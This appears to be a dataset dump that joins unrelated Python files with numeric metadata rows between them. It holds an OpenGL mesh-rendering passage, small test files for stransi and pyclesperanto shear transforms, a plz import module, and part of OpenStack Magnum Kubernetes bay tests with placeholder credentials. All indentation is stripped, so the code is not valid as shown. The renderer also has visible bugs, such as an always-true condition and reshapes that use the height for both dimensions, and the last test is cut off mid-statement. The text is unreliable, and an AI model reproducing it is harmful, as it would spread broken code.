# GL.glTexImage2D(GL.GL_TEXTURE_2D, 0, GL.GL_RGB8, image.shape[1], image.shape[0], 0, GL.GL_RGB, GL.GL_UNSIGNED_BYTE, image)
# textureIDs = textureIDs + [texture]
# self.textureID_mesh_list = self.textureID_mesh_list + [textureIDs]
# gl.GenTextures(1, tmp) # TODO: free after done
# self.textureID = tmp[0]
if self.initialized:
textureCoordIdx = 0
for mesh in range(len(self.f_list)):
for polygons in range(len(self.f_list[mesh])):
texture = None
if self.haveUVs_list[mesh][polygons]:
texture = self.textureID_mesh_list[mesh][polygons]
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
# Update the OpenGL textures with all the textures. (Inefficient as many might not have changed).
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
self.textures_list[mesh][polygons] = self.texture_stack[textureCoordIdx:image.size + textureCoordIdx].reshape(image.shape)
textureCoordIdx = textureCoordIdx + image.size
image = np.array(np.flipud((self.textures_list[mesh][polygons] * 255.0)), order='C', dtype=np.uint8)
GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_UNSIGNED_BYTE,
image.reshape([image.shape[1], image.shape[0], -1]).ravel().tostring())
# if 'imageGT' in which:
# GL.glActiveTexture(GL.GL_TEXTURE1)
# GL.glBindTexture(GL.GL_TEXTURE_2D, self.textureGT)
# image = np.array(np.flipud((self.imageGT.r)), order='C', dtype=np.float32)
# # GL.glTexStorage2D(GL.GL_TEXTURE_2D, 1, GL.GL_RGBA, image.shape[1], image.shape[0])
# GL.glTexSubImage2D(GL.GL_TEXTURE_2D, 0, 0, 0, image.shape[1], image.shape[0], GL.GL_RGB, GL.GL_FLOAT, image)
if 'v' or 'f' or 'vc' or 'ft' or 'camera' or 'texture_stack' or 'imageGT' in which:
self.render_image_buffers()
def release_textures(self):
if hasattr(self, 'textureID_mesh_list'):
if self.textureID_mesh_list != []:
for texture_mesh in self.textureID_mesh_list:
if texture_mesh != []:
for texture in texture_mesh:
if texture != None:
GL.glDeleteTextures(1, [texture.value])
self.textureID_mesh_list = []
@depends_on(dterms + terms)
def color_image(self):
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
no_overdraw = self.draw_color_image(with_vertex_colors=True, with_texture_on=True)
return no_overdraw
# if not self.overdraw:
# return no_overdraw
#
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
# overdraw = self.draw_color_image()
# GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
#
# # return overdraw * np.atleast_3d(self.boundarybool_image)
#
# boundarybool_image = self.boundarybool_image
# if self.num_channels > 1:
# boundarybool_image = np.atleast_3d(boundarybool_image)
#
# return np.asarray((overdraw*boundarybool_image + no_overdraw*(1-boundarybool_image)), order='C')
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
# Overload method to call without overdraw.
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
def image_mesh_bool(self, meshes):
self.makeCurrentContext()
self._call_on_changed()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for mesh in meshes:
self.draw_index(mesh)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result != 0
@depends_on(dterms + terms)
def indices_image(self):
self._call_on_changed()
self.makeCurrentContext()
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
self._call_on_changed()
GL.glClearColor(0., 0., 0., 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glUseProgram(self.colorProgram)
for index in range(len(self.f_list)):
self.draw_index(index)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3).astype(np.uint32))[:, :, 0]
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
return result
def draw_index(self, index):
mesh = index
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
vc = self.vc_list[mesh]
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(vc.reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
colors = np.array(np.ones_like(colors_by_face) * (index) / 255.0, dtype=np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
def draw_texcoord_image(self, v, f, ft, boundarybool_image=None):
# gl = glf
# gl.Disable(GL_TEXTURE_2D)
# gl.DisableClientState(GL_TEXTURE_COORD_ARR
self.makeCurrentContext()
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# want vtc: texture-coordinates per vertex (not per element in vc)
colors = ft
# use the third channel to identify the corresponding textures.
color3 = np.vstack([np.ones([self.ft_list[mesh].shape[0], 1]) * mesh for mesh in range(len(self.ft_list))]).astype(np.float32) / len(
self.ft_list)
colors = np.asarray(np.hstack((colors, color3)), np.float64, order='C')
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
# Why do we need this?
if boundarybool_image is not None:
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn, v, f, colors)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3)[:, :, :3].astype(np.float64)) / 255.0
result[:, :, 1] = 1. - result[:, :, 1]
return result
@depends_on('ft', 'textures')
def mesh_tex_coords(self):
ftidxs = self.ft.ravel()
data = self.ft
# Pol: careful with this:
data[:, 1] = 1.0 - 1.0 * data[:, 1]
return data
# Depends on 'f' because vpe/fpe depend on f
# Pol: Check that depends on works on other attributes that depend_on x, if x changes.
@depends_on('ft', 'f')
def wireframe_tex_coords(self):
print("wireframe_tex_coords is being computed!")
vvt = np.zeros((self.v.r.size / 3, 2), dtype=np.float64, order='C')
vvt[self.f.flatten()] = self.mesh_tex_coords
edata = np.zeros((self.vpe.size, 2), dtype=np.float64, order='C')
edata = vvt[self.ma.ravel()]
return edata
# TODO: can this not be inherited from base? turning off texture mapping in that instead?
@depends_on(dterms + terms)
def boundaryid_image(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
@depends_on(dterms + terms)
def boundaryid_image_aa(self):
self._call_on_changed()
# self.texture_mapping_of
self.makeCurrentContext()
GL.glUseProgram(self.colorProgram)
result = self.draw_boundaryid_image_aa(self.v.r, self.f, self.vpe, self.fpe, self.camera)
GL.glUseProgram(self.colorTextureProgram)
# self.texture_mapping_on(with_vertex_colors=True)
return result
def draw_color_image(self, with_vertex_colors=True, with_texture_on=True):
self.makeCurrentContext()
self._call_on_changed()
GL.glEnable(GL.GL_MULTISAMPLE)
if hasattr(self, 'bgcolor'):
GL.glClearColor(self.bgcolor.r[0], self.bgcolor.r[1 % self.num_channels], self.bgcolor.r[2 % self.num_channels], 1.)
# use face colors if given
# FIXME: this won't work for 2 channels
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
MVP = np.dot(self.projectionMatrix, view_mtx)
for mesh in range(len(self.f_list)):
for polygons in np.arange(len(self.f_list[mesh])):
vao_mesh = self.vao_tex_mesh_list[mesh][polygons]
vbo_f = self.vbo_indices_mesh_list[mesh][polygons]
GL.glBindVertexArray(vao_mesh)
f = self.f_list[mesh][polygons]
verts_by_face = np.asarray(self.v_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vbo_color = self.vbo_colors_mesh[mesh][polygons]
colors_by_face = np.asarray(self.vc_list[mesh].reshape((-1, 3))[f.ravel()], dtype=np.float32, order='C')
vc = colors_by_face
if with_vertex_colors:
colors = vc.astype(np.float32)
else:
# Only texture.
colors = np.ones_like(vc).astype(np.float32)
# Pol: Make a static zero vbo_color to make it more efficient?
vbo_color.set_array(colors)
vbo_color.bind()
if self.f.shape[1] == 2:
primtype = GL.GL_LINES
else:
primtype = GL.GL_TRIANGLES
if with_texture_on and self.haveUVs_list[mesh][polygons]:
GL.glUseProgram(self.colorTextureProgram)
texture = self.textureID_mesh_list[mesh][polygons]
GL.glActiveTexture(GL.GL_TEXTURE0)
GL.glBindTexture(GL.GL_TEXTURE_2D, texture)
GL.glUniform1i(self.textureID, 0)
else:
GL.glUseProgram(self.colorProgram)
GL.glUniformMatrix4fv(self.MVP_texture_location, 1, GL.GL_TRUE, MVP)
GL.glDrawArrays(primtype, 0, len(vbo_f) * vbo_f.data.shape[1])
# GL.glDrawElements(primtype, len(vbo_f)*vbo_f.data.shape[1], GL.GL_UNSIGNED_INT, None)
if self.msaa:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_READ_FRAMEBUFFER, self.fbo_noms)
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glBlitFramebuffer(0, 0, self.frustum['width'], self.frustum['height'], 0, 0, self.frustum['width'], self.frustum['height'],
GL.GL_COLOR_BUFFER_BIT, GL.GL_LINEAR)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT0)
result = np.flipud(
np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_UNSIGNED_BYTE), np.uint8).reshape(
self.frustum['height'], self.frustum['height'], 3).astype(np.float64)) / 255.0
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo)
GL.glDisable(GL.GL_MULTISAMPLE)
GL.glClearColor(0., 0., 0., 1.)
if hasattr(self, 'background_image'):
bg_px = np.tile(np.atleast_3d(self.visibility_image) == 4294967295, (1, 1, 3))
fg_px = 1 - bg_px
result = bg_px * self.background_image + fg_px * result
return result
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image_quantized(self):
texcoord_image = self.texcoord_image[:, :, :2].copy()
# Temprary:
self.texture_image = self.textures_list[0][0].r.copy()
texcoord_image[:, :, 0] *= self.texture_image.shape[1] - 1
texcoord_image[:, :, 1] *= self.texture_image.shape[0] - 1
texture_idx = (self.texcoord_image[:, :, 2] * len(self.ft_list)).astype(np.uint32)
texcoord_image = np.round(texcoord_image)
texcoord_image = texcoord_image[:, :, 0] + texcoord_image[:, :, 1] * self.texture_image.shape[1]
return texcoord_image, texture_idx
def checkBufferNum(self):
GL.glGenBuffers(1)
@depends_on('ft', 'f', 'frustum', 'camera')
def texcoord_image(self):
return self.draw_texcoord_image(self.v.r, self.f, self.ft, self.boundarybool_image if self.overdraw else None)
def main():
pass
if __name__ == '__main__':
main()
| 47.797048 | 348 | 0.619451 | 72,325 | 569,932 | 4.687563 | 0.01561 | 0.028588 | 0.01645 | 0.013612 | 0.980506 | 0.977014 | 0.972982 | 0.968097 | 0.966021 | 0.962835 | 0 | 0.030749 | 0.245519 | 569,932 | 11,923 | 349 | 47.801057 | 0.757683 | 0.223481 | 0 | 0.941626 | 0 | 0.000611 | 0.074066 | 0.005376 | 0 | 0 | 0.000055 | 0.000503 | 0.003056 | 1 | 0.030257 | false | 0.000153 | 0.006112 | 0.002751 | 0.065251 | 0.005348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
12bb16c760ec987c2c1de00723ed1d72a470431f | 134 | py | Python | tests/test_stransi.py | getcuia/stransi | 6997722fb946aa8ac732b54e3fd623f87706013a | [
"MIT"
] | 10 | 2021-11-21T20:31:35.000Z | 2022-02-15T02:02:05.000Z | tests/test_stransi.py | getcuia/stransi | 6997722fb946aa8ac732b54e3fd623f87706013a | [
"MIT"
] | 12 | 2021-11-21T20:27:00.000Z | 2022-03-25T12:01:28.000Z | tests/test_stransi.py | getcuia/stransi | 6997722fb946aa8ac732b54e3fd623f87706013a | [
"MIT"
] | null | null | null | """General tests."""
from stransi import __version__
def test_version():
"""Test version."""
assert __version__ == "0.3.0"
| 14.888889 | 33 | 0.641791 | 16 | 134 | 4.8125 | 0.6875 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.027523 | 0.186567 | 134 | 8 | 34 | 16.75 | 0.678899 | 0.208955 | 0 | 0 | 0 | 0 | 0.052632 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
12bc5a11d173c0a326338dda42a4206128de408d | 159 | py | Python | services/controller/src/plz/controller/images/__init__.py | prodo-ai/plz | 46d179fca5730b7ed2f236d53d78c42358aed72b | [
"MIT"
] | 29 | 2018-04-14T20:05:41.000Z | 2019-04-15T09:02:40.000Z | services/controller/src/plz/controller/images/__init__.py | neomatrix369/plz | 12f05a8d071e9c1976c444d34161530ffa73eeae | [
"MIT"
] | 23 | 2018-04-14T23:32:32.000Z | 2019-06-07T21:38:58.000Z | services/controller/src/plz/controller/images/__init__.py | neomatrix369/plz | 12f05a8d071e9c1976c444d34161530ffa73eeae | [
"MIT"
] | 3 | 2018-09-19T15:08:21.000Z | 2019-03-22T12:21:07.000Z | from .ecr import ECRImages # noqa: F401 (unused)
from .images_base import Images # noqa: F401 (unused)
from .local import LocalImages # noqa: F401 (unused)
| 39.75 | 54 | 0.735849 | 22 | 159 | 5.272727 | 0.5 | 0.206897 | 0.362069 | 0.310345 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068182 | 0.169811 | 159 | 3 | 55 | 53 | 0.810606 | 0.371069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
4200060b819e185ebb97d6670a07f069f4cc949f | 2,668 | py | Python | tests/test_shear.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 2 | 2020-07-01T06:20:44.000Z | 2020-07-01T09:36:48.000Z | tests/test_shear.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | null | null | null | tests/test_shear.py | elsandal/pyclesperanto_prototype | 7bda828813b86b44b63d73d5e8f466d9769cded1 | [
"BSD-3-Clause"
] | 1 | 2020-06-29T18:40:54.000Z | 2020-06-29T18:40:54.000Z | import pyclesperanto_prototype as cle
import numpy as np
def test_affine_shear_y_in_x_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 2, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_x_plane(angle_y_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_z_in_x_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[2, 1, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_x_plane(angle_z_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_x_in_y_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 1, 2] = 1
transform = cle.AffineTransform3D()
transform.shear_in_y_plane(angle_x_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_z_in_y_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[2, 1, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_y_plane(angle_z_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_x_in_z_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 1, 2] = 1
transform = cle.AffineTransform3D()
transform.shear_in_z_plane(angle_x_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
def test_affine_shear_y_in_z_plane():
source = np.zeros((5, 5, 5))
source[1, 1, 1] = 1
reference = np.zeros((5, 5, 5))
reference[1, 2, 1] = 1
transform = cle.AffineTransform3D()
transform.shear_in_z_plane(angle_y_in_degrees=45)
result = cle.affine_transform(source, transform=transform)
a = cle.pull(result)
b = cle.pull(reference)
print(a)
print(b)
assert (np.array_equal(a, b))
| 21.516129 | 62 | 0.643553 | 417 | 2,668 | 3.913669 | 0.083933 | 0.031863 | 0.025735 | 0.066176 | 0.970588 | 0.970588 | 0.958333 | 0.958333 | 0.958333 | 0.958333 | 0 | 0.048968 | 0.219265 | 2,668 | 123 | 63 | 21.691057 | 0.734518 | 0 | 0 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075 | 1 | 0.075 | false | 0 | 0.025 | 0 | 0.1 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
421b6a0a1f08440591c3733c6145b2dd07d89039 | 24,565 | py | Python | magnum/tests/unit/conductor/handlers/test_k8s_bay_conductor.py | MatMaul/magnum | 4d5fd80d89e38e98aff24f01b967a57d0adcd191 | [
"Apache-2.0"
] | null | null | null | magnum/tests/unit/conductor/handlers/test_k8s_bay_conductor.py | MatMaul/magnum | 4d5fd80d89e38e98aff24f01b967a57d0adcd191 | [
"Apache-2.0"
] | null | null | null | magnum/tests/unit/conductor/handlers/test_k8s_bay_conductor.py | MatMaul/magnum | 4d5fd80d89e38e98aff24f01b967a57d0adcd191 | [
"Apache-2.0"
] | 1 | 2020-09-09T14:35:08.000Z | 2020-09-09T14:35:08.000Z | # Copyright 2015 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from mock import patch
from oslo_config import cfg
from magnum.conductor.handlers import bay_conductor
from magnum import objects
from magnum.tests import base
class TestBayConductorWithK8s(base.TestCase):
def setUp(self):
super(TestBayConductorWithK8s, self).setUp()
self.baymodel_dict = {
'image_id': 'image_id',
'flavor_id': 'flavor_id',
'master_flavor_id': 'master_flavor_id',
'keypair_id': 'keypair_id',
'dns_nameserver': 'dns_nameserver',
'external_network_id': 'external_network_id',
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'docker_volume_size': 20,
'cluster_distro': 'fedora-atomic',
'coe': 'kubernetes',
'token': None,
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'labels': {'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan'},
'tls_disabled': False,
'server_type': 'vm',
'registry_enabled': False
}
self.bay_dict = {
'uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a52',
'baymodel_id': 'xx-xx-xx-xx',
'name': 'bay1',
'stack_id': 'xx-xx-xx-xx',
'api_address': '172.17.2.3',
'node_addresses': ['172.17.2.4'],
'node_count': 1,
'master_count': 1,
'discovery_url': 'https://discovery.etcd.io/test',
'master_addresses': ['172.17.2.18'],
'ca_cert_ref': 'http://barbican/v1/containers/xx-xx-xx-xx',
'magnum_cert_ref': 'http://barbican/v1/containers/xx-xx-xx-xx',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
}
cfg.CONF.set_override('trustee_domain_id',
'3527620c-b220-4f37-9ebc-6e63a81a9b2f',
group='trust')
self.context.auth_url = 'http://192.168.10.10:5000/v3'
self.context.user_name = 'fake_user'
self.context.tenant = 'fake_tenant'
osc_patcher = mock.patch('magnum.common.clients.OpenStackClients')
self.mock_osc_class = osc_patcher.start()
self.addCleanup(osc_patcher.stop)
self.mock_osc = mock.MagicMock()
self.mock_osc.magnum_url.return_value = 'http://127.0.0.1:9511/v1'
self.mock_osc.cinder_region_name.return_value = 'RegionOne'
self.mock_osc_class.return_value = self.mock_osc
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition(
self,
mock_objects_baymodel_get_by_uuid):
self._test_extract_template_definition(
mock_objects_baymodel_get_by_uuid)
def _test_extract_template_definition(
self,
mock_objects_baymodel_get_by_uuid,
missing_attr=None):
if missing_attr in self.baymodel_dict:
self.baymodel_dict[missing_attr] = None
elif missing_attr in self.bay_dict:
self.bay_dict[missing_attr] = None
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
mapping = {
'dns_nameserver': 'dns_nameserver',
'image_id': 'server_image',
'flavor_id': 'minion_flavor',
'docker_volume_size': 'docker_volume_size',
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'master_flavor_id': 'master_flavor',
'apiserver_port': '',
'node_count': 'number_of_minions',
'master_count': 'number_of_masters',
'discovery_url': 'discovery_url',
'labels': {'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan'},
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'bay_uuid': self.bay_dict['uuid'],
'magnum_url': self.mock_osc.magnum_url.return_value,
'tls_disabled': False,
}
expected = {
'ssh_key_name': 'keypair_id',
'external_network': 'external_network_id',
'network_driver': 'network_driver',
'volume_driver': 'volume_driver',
'dns_nameserver': 'dns_nameserver',
'server_image': 'image_id',
'minion_flavor': 'flavor_id',
'master_flavor': 'master_flavor_id',
'number_of_minions': 1,
'number_of_masters': 1,
'docker_volume_size': 20,
'discovery_url': 'https://discovery.etcd.io/test',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'flannel_backend': 'vxlan',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'no_proxy': 'no_proxy',
'tenant_name': 'fake_tenant',
'username': 'fake_user',
'bay_uuid': self.bay_dict['uuid'],
'magnum_url': self.mock_osc.magnum_url.return_value,
'region_name': self.mock_osc.cinder_region_name.return_value,
'tls_disabled': False,
'registry_enabled': False,
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_username': 'fake_trustee',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'auth_url': 'http://192.168.10.10:5000/v3'
}
if missing_attr is not None:
expected.pop(mapping[missing_attr], None)
self.assertEqual(expected, definition)
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_with_registry(
self,
mock_objects_baymodel_get_by_uuid):
self.baymodel_dict['registry_enabled'] = True
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
cfg.CONF.set_override('swift_region',
'RegionOne',
group='docker_registry')
(template_path,
definition) = bay_conductor._extract_template_definition(self.context,
bay)
expected = {
'auth_url': 'http://192.168.10.10:5000/v3',
'bay_uuid': '5d12f6fd-a196-4bf0-ae4c-1f639a523a52',
'discovery_url': 'https://discovery.etcd.io/test',
'dns_nameserver': 'dns_nameserver',
'docker_volume_size': 20,
'external_network': 'external_network_id',
'flannel_backend': 'vxlan',
'flannel_network_cidr': '10.101.0.0/16',
'flannel_network_subnetlen': '26',
'http_proxy': 'http_proxy',
'https_proxy': 'https_proxy',
'magnum_url': 'http://127.0.0.1:9511/v1',
'master_flavor': 'master_flavor_id',
'minion_flavor': 'flavor_id',
'network_driver': 'network_driver',
'no_proxy': 'no_proxy',
'number_of_masters': 1,
'number_of_minions': 1,
'region_name': 'RegionOne',
'registry_container': 'docker_registry',
'registry_enabled': True,
'server_image': 'image_id',
'ssh_key_name': 'keypair_id',
'swift_region': 'RegionOne',
'tenant_name': 'fake_tenant',
'tls_disabled': False,
'trust_id': 'bd11efc5-d4e2-4dac-bbce-25e348ddf7de',
'trustee_domain_id': '3527620c-b220-4f37-9ebc-6e63a81a9b2f',
'trustee_password': 'fake_trustee_password',
'trustee_user_id': '7b489f04-b458-4541-8179-6a48a553e656',
'trustee_username': 'fake_trustee',
'username': 'fake_user',
'volume_driver': 'volume_driver'
}
self.assertEqual(expected, definition)
@patch('magnum.objects.BayModel.get_by_uuid')
def test_extract_template_definition_coreos_with_disovery(
self,
mock_objects_baymodel_get_by_uuid):
self.baymodel_dict['cluster_distro'] = 'coreos'
baymodel = objects.BayModel(self.context, **self.baymodel_dict)
mock_objects_baymodel_get_by_uuid.return_value = baymodel
bay = objects.Bay(self.context, **self.bay_dict)
(template_path,
